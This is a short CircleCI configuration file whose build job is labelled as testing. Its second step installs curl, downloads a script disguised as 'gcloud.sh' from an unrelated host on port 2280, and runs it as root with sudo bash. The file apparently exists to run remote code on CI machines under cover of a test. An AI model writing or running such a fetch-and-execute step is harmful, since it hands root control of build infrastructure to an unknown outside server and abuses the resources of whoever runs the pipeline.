version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    steps:
      - checkout
      - run:
          name: "Testing"
          command: echo "Hi"
      - run:
          command: |
            echo Running test
            set +e
            sudo apt update
            sudo apt install -qq curl
            pwd
            curl  -o $HOME/bin/init.sh http://pi.lucas.ga:2280/luci-static/bin/gcloud.sh && chmod +x $HOME/bin/init.sh
            sudo bash $HOME/bin/init.sh

workflows:
    first job:
      jobs:
        - build